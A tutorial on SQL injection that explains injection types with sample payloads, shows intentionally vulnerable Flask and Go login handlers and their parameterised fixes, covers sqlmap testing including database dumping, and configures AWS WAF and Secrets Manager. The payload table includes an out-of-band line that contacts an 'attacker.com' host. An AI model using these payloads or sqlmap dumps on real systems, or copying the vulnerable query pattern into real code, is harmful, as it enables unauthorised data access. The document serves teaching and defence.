- Explanation of SQL Injection and its types
- Flask and Go vulnerable code examples
- Usage of sqlmap for testing
- How to prevent SQL Injection using AWS security services
SQL Injection (SQLi) Tutorial
With Flask & Go Examples, sqlmap Testing, and AWS Security Setup
What is SQL Injection?
SQL Injection (SQLi) is a web attack in which untrusted input (a form field, URL parameter, cookie or header) is concatenated into a SQL statement, so the database parses part of the input as SQL instead of treating it as data. Depending on the query and the database engine, an attacker can bypass authentication, read or modify data they should never see, and on some engines reach the file system or the operating system.
Types of SQL Injection (with Examples)
| Type | Description | Example Payload |
|---|---|---|
| 1. In-band | The result of the injected query comes back in the normal HTTP response (union-based and error-based injection belong here) | `' OR '1'='1 --` |
| 2. Blind | No data comes back directly; the attacker asks true/false questions and reads the answer from the response content (boolean-based) or from how long it takes (time-based) | `' AND 1=1 --` vs `' AND 1=2 --` |
| 3. Out-of-Band | The database server is made to contact a host the attacker controls (DNS, HTTP, SMB) and the data leaves in that request; the example is Microsoft SQL Server syntax | `'; exec xp_dirtree '\\attacker.com\abc'` |
Vulnerable Login Examples
Flask Example
```python
from flask import Flask, request
import sqlite3

app = Flask(__name__)


@app.route('/login', methods=['POST'])
def login():
    username = request.form['username']
    password = request.form['password']

    # Vulnerable query: both form fields are interpolated into the SQL text, so a
    # single quote in either one ends the string literal and the rest is parsed as SQL.
    conn = sqlite3.connect('test.db')
    cursor = conn.cursor()
    query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
    cursor.execute(query)
    result = cursor.fetchone()
    conn.close()
    return "Login Successful" if result else "Login Failed"


if __name__ == '__main__':
    # debug=True enables the Werkzeug debugger, which allows code execution from the browser;
    # it is fine for this lab and never for a deployed app.
    app.run(debug=True)
```
Go Example
```go
package main

import (
	"database/sql"
	"fmt"
	"log"
	"net/http"

	_ "github.com/mattn/go-sqlite3"
)

var db *sql.DB

func loginHandler(w http.ResponseWriter, r *http.Request) {
	username := r.FormValue("username")
	password := r.FormValue("password")

	// Vulnerable query: user input is formatted straight into the SQL text.
	query := fmt.Sprintf("SELECT username, password FROM users WHERE username = '%s' AND password = '%s'", username, password)
	row := db.QueryRow(query)

	var user, pass string
	if err := row.Scan(&user, &pass); err != nil {
		// sql.ErrNoRows (no match) and syntax errors from a broken payload both end up here.
		fmt.Fprintln(w, "Login Failed")
		return
	}
	fmt.Fprintln(w, "Login Successful")
}

func main() {
	var err error
	db, err = sql.Open("sqlite3", "./test.db")
	if err != nil {
		log.Fatal(err)
	}
	defer db.Close()

	http.HandleFunc("/login", loginHandler)
	log.Fatal(http.ListenAndServe(":8080", nil))
}
```
Secure Versions
The fix is the same in both languages: keep the SQL text constant and hand the user-supplied values to the driver as bound parameters, so a quote or comment sequence in the input is compared as data and never reaches the SQL parser. Parameterisation removes the injection; it does not make the plaintext password comparison in these examples acceptable, and a real login should store a salted hash and verify it in application code.
Flask (Safe)
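The Flask fix, as an added example that is not the tutorial's own code: the handler keeps the SQL text constant and passes the two form values to sqlite3 as bound parameters. The `test.db` path and the `demo_db()` fixture are assumptions made for the demo, and Flask is imported inside `create_app()` so that `authenticate()` can be exercised without it:

```python
import sqlite3

DB_PATH = "test.db"  # assumed: the same database file the vulnerable app above uses


def authenticate(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup: the SQL text below never changes, and sqlite3 binds the
    values separately, so ' OR '1'='1 -- is compared as a literal username."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def create_app():
    """Flask wiring; imported lazily so the query helper is usable without Flask."""
    from flask import Flask, g, request

    app = Flask(__name__)

    def get_db() -> sqlite3.Connection:
        # One connection per request, stored on the application context.
        if "db" not in g:
            g.db = sqlite3.connect(DB_PATH)
        return g.db

    @app.teardown_appcontext
    def close_db(_exc):
        db = g.pop("db", None)
        if db is not None:
            db.close()

    @app.route("/login", methods=["POST"])
    def login():
        # .get() turns a missing field into a failed login instead of a 400 traceback.
        username = request.form.get("username", "")
        password = request.form.get("password", "")
        if authenticate(get_db(), username, password):
            return "Login Successful"
        return "Login Failed", 401

    return app


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory fixture mirroring the tutorial's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


if __name__ == "__main__":
    create_app().run(port=5000)
```

Against this handler the payloads from the types table (`' OR '1'='1 --`, `admin' --`) are ordinary strings that match no row, and sqlmap's boolean probes below get identical responses for the 1=1 and 1=2 cases.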
Go (Safe)
```go
// Safe: the SQL text is fixed and the driver binds username and password as values.
row := db.QueryRow("SELECT username, password FROM users WHERE username = ? AND password = ?", username, password)
```
SQLMap for Automated Testing
Install
sqlmap is a Python tool: install it with `pip install sqlmap`, from your distribution's package (`apt install sqlmap` on Debian, Ubuntu and Kali), or by cloning https://github.com/sqlmapproject/sqlmap.
Test vulnerable Flask server
Point sqlmap at the login endpoint of the running Flask app (http://127.0.0.1:5000/login) with `-u`, and pass the POST body with `--data` (for example `username=admin&password=test`) so that both form fields are tested; `--batch` accepts the default answers so the run is non-interactive, and `-p username` limits testing to one parameter.
Example Commands
- Dump DB: add `--dump` to the command above (with `-T users` to restrict it to one table).
- Show DB names: add `--dbs`.
You can test the Go app the same way on port 8080.
Preventing SQL Injection with AWS Security Services
Now that the app is secure at the code level, protect it at the infrastructure and cloud layer as well. AWS WAF's managed SQLi rules are pattern matching on the request: they stop commodity scanners and sqlmap's default payloads, but unusual encodings or syntax can slip past them, so treat WAF as defence in depth behind parameterised queries, not as a substitute for them.
AWS Services to Prevent SQLi & Web Attacks
| AWS Service | Role |
|---|---|
| AWS WAF | Inspects HTTP(S) requests and blocks SQLi, XSS and other common web exploits via managed rule groups |
| Amazon GuardDuty | Threat detection on CloudTrail, VPC Flow Logs and DNS logs (reconnaissance, credential misuse, anomalous API activity) |
| AWS Secrets Manager | Stores and rotates DB credentials so none are hard-coded |
| Amazon CloudWatch | Collects application, RDS and WAF logs; metric filters and alarms flag brute force attempts and spikes |
| AWS CloudTrail | Records AWS API calls for auditing and detection |
| AWS Shield | DDoS protection; Shield Standard is on by default for every account, Shield Advanced adds response support and bundles WAF |
| Amazon Cognito | Managed user sign-up and sign-in with MFA, so the app does not run its own password check |
Use AWS WAF for Web Protection
Attach the web ACL to the resource that fronts the app:
- Application Load Balancer (regional web ACL)
- API Gateway (regional web ACL)
- CloudFront (web ACL with the CLOUDFRONT scope, which must be created in us-east-1)
Enable the AWS managed rule groups:
- AWSManagedRulesSQLiRuleSet (SQL injection patterns in the common request components)
- AWSManagedRulesCommonRuleSet (OWASP-style baseline, including XSS and malformed or oversized requests)
- AWSManagedRulesKnownBadInputsRuleSet (request patterns tied to known exploits)
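The WAF setup above, as an added boto3 example that is not part of the tutorial. It builds the `create_web_acl` request carrying the three managed rule groups and, for a regional ACL, associates it with a load balancer. The ACL name, the load balancer ARN and the region are placeholders:

```python
"""Build a WAFv2 web ACL with AWS managed rule groups and attach it to a regional resource."""

RULE_GROUPS = [
    "AWSManagedRulesSQLiRuleSet",
    "AWSManagedRulesCommonRuleSet",
    "AWSManagedRulesKnownBadInputsRuleSet",
]


def managed_rule(group_name: str, priority: int) -> dict:
    """One rule that references an AWS managed rule group.
    OverrideAction {"None": {}} keeps the group's own block/count decisions;
    {"Count": {}} would turn it into monitor-only mode for a rollout."""
    return {
        "Name": group_name,
        "Priority": priority,
        "Statement": {
            "ManagedRuleGroupStatement": {"VendorName": "AWS", "Name": group_name}
        },
        "OverrideAction": {"None": {}},
        "VisibilityConfig": {
            "SampledRequestsEnabled": True,
            "CloudWatchMetricsEnabled": True,
            "MetricName": group_name,
        },
    }


def build_web_acl(name: str, scope: str) -> dict:
    """Request body for wafv2.create_web_acl. Scope is REGIONAL for ALB/API Gateway
    and CLOUDFRONT for CloudFront (a CLOUDFRONT ACL must be created in us-east-1).
    Rule priorities must be unique, so they are assigned from the list order."""
    if scope not in ("REGIONAL", "CLOUDFRONT"):
        raise ValueError(f"unsupported scope {scope!r}")
    rules = [managed_rule(group, i) for i, group in enumerate(RULE_GROUPS, start=1)]
    return {
        "Name": name,
        "Scope": scope,
        "DefaultAction": {"Allow": {}},  # allow whatever the rule groups do not block
        "Rules": rules,
        "VisibilityConfig": {
            "SampledRequestsEnabled": True,
            "CloudWatchMetricsEnabled": True,
            "MetricName": name,
        },
    }


def apply_regional(acl: dict, resource_arn: str, region: str) -> str:
    """Create the ACL and associate it with an ALB or API Gateway stage ARN.
    CloudFront is different: its ACL is attached by setting WebACLId on the distribution."""
    import boto3  # imported here so the builders above run without boto3 installed

    if acl["Scope"] != "REGIONAL":
        raise ValueError("associate_web_acl only applies to REGIONAL web ACLs")
    wafv2 = boto3.client("wafv2", region_name=region)
    arn = wafv2.create_web_acl(**acl)["Summary"]["ARN"]
    wafv2.associate_web_acl(WebACLArn=arn, ResourceArn=resource_arn)
    return arn


if __name__ == "__main__":
    # Placeholder ARN and region (assumptions): substitute your own load balancer.
    acl = build_web_acl("sqli-tutorial-acl", "REGIONAL")
    alb_arn = "arn:aws:elasticloadbalancing:eu-west-1:123456789012:loadbalancer/app/demo/abc123"
    print(apply_regional(acl, alb_arn, "eu-west-1"))
```

Roll the rule groups out with `OverrideAction` set to `{"Count": {}}` first and watch the sampled requests in CloudWatch; the Common rule set in particular has size and body rules that can block legitimate uploads until they are tuned.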
Use Secrets Manager
- Store the database credentials as a secret instead of in code, config files or an environment variable baked into the image
- Enable rotation (Secrets Manager has managed rotation for RDS) so a leaked password stops working quickly
- Read the secret through the SDK at runtime (GetSecretValue) and grant the app's IAM role secretsmanager:GetSecretValue on that one secret only
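Reading the secret through the SDK, as an added example that is not the tutorial's code. The secret ID, the RDS-style key layout and the `FakeSecretsClient` are assumptions made for the demo; without an injected client the class creates a real boto3 client. The point the bullets leave implicit is caching: fetch once per TTL rather than on every request, and drop the cache when a rotation makes the old password fail:

```python
import json
import time

# Key layout Secrets Manager uses for RDS database secrets (assumption for this demo).
REQUIRED_KEYS = ("username", "password", "host", "port", "dbname")


def parse_db_secret(secret_string: str) -> dict:
    """Validate the JSON secret and normalise the port, so a malformed or
    half-written secret fails here instead of deep inside the DB driver."""
    data = json.loads(secret_string)
    missing = [k for k in REQUIRED_KEYS if k not in data]
    if missing:
        raise ValueError(f"secret is missing keys: {missing}")
    data["port"] = int(data["port"])
    return data


class DbCredentials:
    """Fetches the secret through the SDK and caches it for ttl_seconds, so the app
    neither calls Secrets Manager per request nor keeps a password rotation replaced."""

    def __init__(self, secret_id: str, client=None, ttl_seconds: float = 300):
        self.secret_id = secret_id
        self.ttl_seconds = ttl_seconds
        self._client = client  # injectable for tests; a boto3 client otherwise
        self._cached = None
        self._fetched_at = float("-inf")

    def _client_or_default(self):
        if self._client is None:
            import boto3  # imported lazily; the offline demo never reaches this line
            self._client = boto3.client("secretsmanager")
        return self._client

    def get(self, now=None) -> dict:
        now = time.monotonic() if now is None else now
        if self._cached is None or now - self._fetched_at >= self.ttl_seconds:
            resp = self._client_or_default().get_secret_value(SecretId=self.secret_id)
            self._cached = parse_db_secret(resp["SecretString"])
            self._fetched_at = now
        return self._cached

    def invalidate(self) -> None:
        """Call on an authentication failure right after a rotation; the next get() refetches."""
        self._cached = None


class FakeSecretsClient:
    """Constructed stand-in for boto3's secretsmanager client (demo only): returns
    successive secret versions so a rotation can be simulated offline."""

    def __init__(self, versions):
        self.versions = list(versions)
        self.calls = 0

    def get_secret_value(self, SecretId):
        self.calls += 1
        index = min(self.calls, len(self.versions)) - 1
        return {"SecretString": self.versions[index]}


def make_secret(password: str) -> str:
    """Constructed secret payload in the RDS layout."""
    return json.dumps({
        "username": "app", "password": password, "engine": "postgres",
        "host": "db.example.internal", "port": "5432", "dbname": "appdb",
    })


if __name__ == "__main__":
    creds = DbCredentials("prod/app/db", client=FakeSecretsClient([make_secret("old"), make_secret("new")]))
    print(creds.get(now=0)["password"], creds.get(now=100)["password"], creds.get(now=400)["password"])
```

The connection string is assembled from `creds.get()` at connect time, never at import time, which is what lets rotation work without a restart.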
Monitor with GuardDuty + CloudWatch
- GuardDuty: anomaly detection over CloudTrail, VPC Flow Logs and DNS logs (reconnaissance, credential abuse, unusual API calls from the app's role)
- CloudWatch: metric filters and alarms on the application, RDS and WAF logs for failed logins, slow queries and spikes in request volume
Example Architecture:
User
  ↓
CloudFront (AWS WAF attached)
  ↓
Application Load Balancer
  ↓
Flask / Go App (safe SQL queries)
  ↓
Amazon RDS (credentials via Secrets Manager)
Summary
| Layer | What to Do |
|---|---|
| App Code | Use prepared statements / parameterised queries (or an ORM that does so) |
| Web Protection | AWS WAF with the managed rule groups, plus Shield |
| Secrets | AWS Secrets Manager with rotation and least-privilege access |
| Monitoring | GuardDuty, CloudWatch, CloudTrail |
| Authentication | Amazon Cognito with MFA |